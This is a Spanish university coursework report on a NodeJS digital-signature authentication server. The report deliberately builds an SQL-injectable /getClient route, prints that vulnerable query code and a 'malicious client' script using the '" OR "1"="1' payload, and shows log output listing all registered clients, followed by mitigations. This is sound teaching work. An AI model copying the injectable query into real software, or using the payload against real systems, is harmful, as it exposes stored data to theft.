% 66.69 Criptografía y Seguridad Informática - Trabajo Práctico
% Dec 10th, 2021

\begin{center} 
\includegraphics[]{imagenes/logo.jpg}
\end{center}

\vspace*{2cm}

\begin{center}
\begin{tabular}{ |c|c|c| }
 \hline
 Integrante & Padron & Email \\
 \hline
 Donato, Juan Pablo & 100839 & judonato@fi.uba.ar \\ 
 \hline
 Dambra, Juan & 95159 & juan.dambra@gmail.com \\ 
 \hline
 Marco del Pont, Matias & 101302 & mmarco@fi.uba.ar \\ 
 \hline
\end{tabular}
\end{center}

\newpage

## Introducción

El presente informe tiene como objetivo detallar la propuesta de trabajo final que hicimos y cómo desarrollamos la solución. En esta oportunidad, el trabajo se basó en el concepto de **Firma Digital**, donde desarrollamos una aplicación que implemente un mecanismo de comunicación sobre HTTP que permite firmar digitalmente un mensaje y validar desde el receptor que el mensaje sea de un emisor confiable. Tambien se explora como se puede explotar la vulnerabilidad de SQL Injection, usando el mismo servidor.

\vspace*{1cm}

## Propuesta

El desarrollo del trabajo consiste en un servidor en NodeJS que ejecute ciertos servicios, y varias aplicaciones desarrolladas también en NodeJS que le harán peticiones a este servidor.

Como se mencionó, el servidor ofrecerá a los clientes algunos servicios a utilizar pero el foco del trabajo estará en la *autenticación*, verificando que quien le envía ese mensaje es realmente quien dice ser con un mecanismo de llave pública-privada.

Las aplicaciones cliente tienen una llave privada, y le reportan al servidor su llave pública que van a estar utilizando para identificarse. Cuando un cliente quiere enviarle una petición al servidor, encripta el mensaje con su llave privada y se lo envía mediante el protocolo HTTP al servidor junto con su id de cliente. El servidor tiene guardados en una base de datos los id de los clientes con sus llaves públicas correspondientes. Al recibir este mensaje intenta descifrar el mensaje con la llave pública, y si puede, quiere decir que el cliente es efectivamente quien dice ser, y se pueden ejecutar los servicios con seguridad.

![](imagenes/propuesta_inicial.png)

Entonces, identificamos dos flujos principales en la funcionalidad de la aplicación:

- Registro de un cliente en un servidor, proporcionando clave pública por parte del cliente
- Autenticación y utilización de un servicio de Logging en el servidor por parte del cliente

\vspace*{1cm}

### SQL Injection

Adicionalmente a lo anterior, quisimos desarrollar un flujo extra donde podamos mostrar un caso de injección SQL de parte de un cliente, por más de que sea un cliente registrado en la aplicación, como una vulnerabilidad en el servidor. Para eso, propusimos un servicio adicional en el servidor que permite obtener los datos de un cliente en particular proporcionando el nombre del mismo. Podría pensarse al servidor como un *Public-Key Authority* donde un cliente A solicita la clave de un cliente B para luego establecer una comunicación con él.

![](imagenes/pka.png)
\vspace*{1cm}

El esquema de la situación de injección SQL que planteamos es el siguiente:

![](imagenes/sql-injection.png)

En el diagrama de arriba tenemos:

- Un cliente "malicioso" ya registrado en el servidor se propone extraer información adicional del servidor.
- Arma una consulta por un determinado cliente, encriptando el mensaje con su llave privada. Dentro del mensaje, se encuentra la injeccion SQL
- El servidor recibe la petición, valida que el cliente es quien dice ser, y al confiar en él ejecuta la petición.
- El cliente malicioso obtiene la informacion de todos los clientes registrados en la base de datos del servidor

## Desarrollo

Tanto servidor como clientes fueron desarrollados en NodeJS, utilizando las librerias:

- `express`, para el armado de las interfaces HTTP en el servidor,
- `crypto`, para la construcción del par de claves y la validación de las mismas
- `sqlite` como motor de base de datos del servidor

### Servidor

En el servidor podemos encontrar las siguientes rutas:

- `/register`: utilizadas por los clientes para registrarse, enviando su clave publica
- `/log`: servicio de logging que utilizarán unicamente los clientes registrados
- `/getClient`: servicio de obtención de datos de un cliente dado su nombre

Para la primera de las rutas tenemos el siguiente código:

```javascript
/**
 * Receives a public key with a client id and saves it on the database
 */
router.post('/register/', async function (req, res) {
  let { clientId, publicKey, clientName } = req.body
  console.log(`REGISTERING for clientId ${clientId}`)
  await services.registerKey(clientId, publicKey, clientName)
  return "OK"
})
```

La ruta de `/register` toma el id y nombre del cliente, y la clave publica. Luego, registra la clave del mismo, almacenandola en su base de datos.

\vspace*{1cm}

Luego tenemos la ruta `/log`:

```javascript
/**
 * Receives an encrypted message with a client id. Verifies that the message
 * was encrypted with the client id private key and logs it.
 */
router.post('/log/', async function (req, res) {
  let { clientId, sign, message } = req.body
  console.log(`LOGGING for clientId ${clientId} with sign ${sign}`)
  try {
    await services.validateSign(clientId, sign)
    await services.logMessage(clientId, message)
  }
  catch (err) {
    res.sendStatus(400)
  }
})
```

Como vemos, el cliente envia su identificador, el mensaje a loggear y la firma a validar. El servidor primero valida la firma del cliente: si la firma es invalida, quiere decir que el cliente no es el propietario de la clave pública que registró previamente, por lo que el servidor rechaza la petición. Si es válida, almacena el log en su base de datos.

### Cliente

El cliente básico desarrollado es el siguiente:

```javascript
exports.newClient = async function () {
  console.log("New Client")
  const clientId = uuidv4()
  const clientName = "trustworthy_client"

  let keyPair = await utils.generateKeyPair(clientId)
  api.register(clientId, keyPair.publicKey, clientName)
  let message = "New Message"
  data = {
    message: "New Message",
    sign: utils.sign(keyPair.privateKey, clientId)
  }

  api.log(clientId, data)
}
```

Como vemos, el cliente efectua los siguientes pasos:

- Genera un ID con formato UUID, y define su nombre
- Genera un par de claves. La clave publica siendo SPKI y la privada siendo PKCS8. Guarda la clave privada en un archivo:

```javascript
await crypto.generateKeyPairSync('rsa', {
    modulusLength: 4096,
    publicKeyEncoding: { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' },
})
```

- Se registra en el servidor, enviando ID, nombre y clave publica.
- Arma el mensage a logear, enviando mensaje, firma e identificador.

### Ejecución

Para ejecutar la aplicación, proveemos un Makefile con algunas directivas para hacer mas sencillo el proceso de levantar el servidor y los clientes:

```bash
# Levantar el servidor
make up

# Hacer el follow de logs
make logs

# Levantar el cliente, desde otra terminal
make client
```

Una vez hecho esto, si observamos los logs del servidor podemos ver algo como lo siguiente:

```
0|server  | [SERVER]  REGISTERING for clientId 7deec8ce-b47c-4563-8d10-e6767c8d677d
0|server  | [SERVER]  LOGGING for clientId 7deec8ce-b47c-4563-8d10-e6767c8d677d 
with sign 3e1704b249f6d700428d30...
0|server  | [SERVER]  Client ID Verified
0|server  | [SERVER]  Message logged successfully!
```

Entonces, podemos ver que:

1. El cliente con ID 7deec8ce-b47c-4563-8d10-e6767c8d677d se registra en el servidor.
2. El mismo cliente envia una petición de logging hacia el servidor.
3. El servidor valida la identidad del cliente. El mismo corresponde al que se ha registrado en el paso 1.
4. El servidor informa que el mensaje se ha almacenado correctamente.

### SQL Injection

Ahora veamos la implementación para este caso. En el servidor tenemos la ruta `/getClient`:

```javascript
router.post('/getClient', async function (req, res) {
  let { clientId, sign, desiredClientName } = req.body
  console.log(`GET CLIENT for clientId ${clientId} with sign ${sign}`)
  let result
  try {
    await services.validateSign(clientId, sign)
    result = await services.getClient(desiredClientName)
  }
  catch (err) {
    console.log(err)
    res.sendStatus(400)
  }

  res.status(200).send(result)
})
```

Como vemos, nuevamente el servidor primero valida la firma del cliente que realiza la petición para autenticarlo. Luego de autenticarlo, ejecutará el servicio de obtención de cliente por su nombre:

```javascript
async function getClient(clientName) {
    return new Promise((resolve, reject) => {
        db.all(
            `SELECT client_name, public_key FROM clients 
            WHERE client_name="${clientName}"`
        , (err, rows) => {
            if (err) return reject(err)
            return resolve(rows)
        })
    })
}
```

El código que ejecuta la busqueda el cliente en la base de datos es el que vemos arriba. Como se puede ver, es totalmente vulnerable a una injección SQL: el servidor confia plenamente en que el cliente enviará el nombre del cliente que esta intentando buscar, pero con ciertos artilugios un cliente malicioso podría extraer mas información de la que se debería devolver.

La implementación del cliente "malicioso" entonces será la siguiente:

```javascript
exports.stealInformation = async function () {
  console.log("Creating new client")
  const clientId = uuidv4()
  const clientName = "malicious_client"

  let keyPair = await utils.generateKeyPair(clientId)
  api.register(clientId, keyPair.publicKey, clientName)
  data = {
    sign: utils.sign(keyPair.privateKey, clientId),
    desiredClientName: '" OR "1"="1'
  }

  api.getClient(clientId, data).then((result) => {
    console.log("Data retrieved from server: ", result)
  })
}
```

\vspace*{1cm}

Como vemos, el cliente primero se hace pasar por un cliente confiable, registrando su clave pública en el servidor. Posteriormente, envia la solicitud de busqueda de un cliente en la base de datos, pero en lugar de completar con un nombre válido, busca por `" OR "1"="1`.

Por como está diseñado el servidor, la busqueda en la base de datos que el mismo realizará será la siguiente:

```sql
SELECT client_name, public_key 
FROM clients 
WHERE client_name="" OR "1"="1"
```

lo que provocará que el servidor devuelva **todos** los datos de todos los clientes que tenga almacenados.

Esto podemos verlo con la ejecución de los siguientes comandos:

```bash
# Levantar el servidor
make up

# Hacer el follow de logs
make logs

# Levantar el cliente malicioso, desde otra terminal
make malicious-client
```

En la salida del cliente malicioso deberiamos ver algo como esto:

```bash
2|run_malicious_client  | [MALICIOUS_CLIENT]  Creating new client
2|run_malicious_client  | [MALICIOUS_CLIENT]  Sending getClient with data {
2|run_malicious_client  |   sign: '35a9c159839ef...',
2|run_malicious_client  |   desiredClientName: '" OR "1"="1'
2|run_malicious_client  | }
2|run_malicious_client  | [MALICIOUS_CLIENT]  Data retrieved from server:  [
2|run_malicious_client  |   {
2|run_malicious_client  |     client_name: 'trustworthy_client',
2|run_malicious_client  |     public_key: '-----BEGIN PUBLIC KEY-----\n' +
2|run_malicious_client  |       'MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAwfD7k1QHWgAiJ39PgRvI\n' +
2|run_malicious_client  |       'P5NjZNyV0UV9Sx9KnB1SPOvkAR4RUjdoLEwKMjkNfoACIoi5JNt4Lz06c6R+2zoR\n' +
2|run_malicious_client  |       .
2|run_malicious_client  |       .
2|run_malicious_client  |       .
2|run_malicious_client  |       'Zr18MbjpsLQNFltdt7P9y4ECAwEAAQ==\n' +
2|run_malicious_client  |       '-----END PUBLIC KEY-----\n'
2|run_malicious_client  |   },
2|run_malicious_client  |   {
2|run_malicious_client  |     client_name: 'dog_client',
2|run_malicious_client  |     public_key: '-----BEGIN PUBLIC KEY-----\n' +
2|run_malicious_client  |       'MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA89YosJUGUzw+7frAi7BO\n' +
2|run_malicious_client  |       '00d2QlmPkqu3zXVxX4r8uX4DW1ryX5P64d754T+WrnES4KylOXICvp8BbKVwN9kz\n' +
2|run_malicious_client  |       .
2|run_malicious_client  |       .
2|run_malicious_client  |       .
2|run_malicious_client  |       'xcZCtQEG7A3gRJpYSLlofs0CAwEAAQ==\n' +
2|run_malicious_client  |       '-----END PUBLIC KEY-----\n'
2|run_malicious_client  |   },
2|run_malicious_client  |   {
2|run_malicious_client  |     client_name: 'cafe_client',
2|run_malicious_client  |     public_key: '-----BEGIN PUBLIC KEY-----\n' +
2|run_malicious_client  |       'MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAwFZF6gzxz8Ije0BRRgMh\n' +
2|run_malicious_client  |       'lgdaPzYH7exOgM/z2AbPCWWQAmVsvHBiP3X5hWN5FtuVf8WrvjLv+WHlKKX7iOc4\n' +
2|run_malicious_client  |       .
2|run_malicious_client  |       .
2|run_malicious_client  |       .
2|run_malicious_client  |       'a8+TNsymXjfCZveJHvuvQQECAwEAAQ==\n' +
2|run_malicious_client  |       '-----END PUBLIC KEY-----\n'
2|run_malicious_client  |   },
2|run_malicious_client  |   {
2|run_malicious_client  |     client_name: 'malicious_client',
2|run_malicious_client  |     public_key: '-----BEGIN PUBLIC KEY-----\n' +
2|run_malicious_client  |       'MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAxbwsDiCk4nPkcoG/taDS\n' +
2|run_malicious_client  |       'i7AILEoo+aOFxlr0xSkYZd/WN1cjgDx6eil3mDdYPX0teez0Z6x1ktsL1F+Cc9T8\n' +
2|run_malicious_client  |       .
2|run_malicious_client  |       .
2|run_malicious_client  |       .
2|run_malicious_client  |       'b6z/U0C4g3XeHc8BUJYaqV0CAwEAAQ==\n' +
2|run_malicious_client  |       '-----END PUBLIC KEY-----\n'
2|run_malicious_client  |   }
2|run_malicious_client  | ]
```

Como podemos ver, el cliente obtuvo a todos los clientes registrados en el servidor.


Esta vulnerabilidad esta principalmente dada por el mal diseño adoptado en el servidor a la hora de ofrecer el servicio de consulta de clientes. Algunas posibles soluciones para mitigar este tipo de vulnerabilidades pueden ser:

- Sanitizacion y validacion de todos los parametros que se reciban por entrada.
- Preprocesamiento de la respuesta a enviar al cliente, posteriormente de realizar la consulta
- Utilización de frameworks de consultas SQL (por ejemplo: ORMs)

## Alternativas

Como una alternativa a la vulnerabilidad explorada, se puede pensar en un *man in the middle*. Si este lograra spoofear la direccion del servidor, entonces podria interceptar todos los mensajes que se compartan entre cliente y servidor. Al ser la clave inicial compartida, entonces este servidor MiM puede interceptar la clave publica compartida en el flujo "/register", guardarla, y generar una nueva. De esa manera, puede ingresar su propia clave privada y adueñarse de la identidad del cliente, pudiendo loguear sus propios mensajes aun sin que el cliente lo haya hecho, y pudiendo tanto leer como modificar los mensajes que el cliente.

## Conclusiones

Hemos podido desarrollar nuestro principal objetivo de este trabajo, que consistia de la autenticacion de un cliente en un servidor utilizando un sistema de claves asimetricas para emular un flujo de *firma digital*. Adicionalmente y para poner en práctica otros conocimientos adquiridos en la materia, hemos desarrollado un sistema vulnerable a uno de los riesgos mas importante dentro del proyecto OWASP Top 10 como es el *SQL Injection* para evidenciar este tipo de vulnerabilidades y establecer buenas (y malas) prácticas que conllevan a la posible explotación de esta vulnerabilidad. Tambien se explora conceptualmente la vulnerabilidad de *Man in the Middle*, a la cual este sistema esta expuesto.


## Anexo

- Link al repositorio del proyecto

[https://gitlab.com/MatiasMdelP1/tp-cripto](https://gitlab.com/MatiasMdelP1/tp-cripto)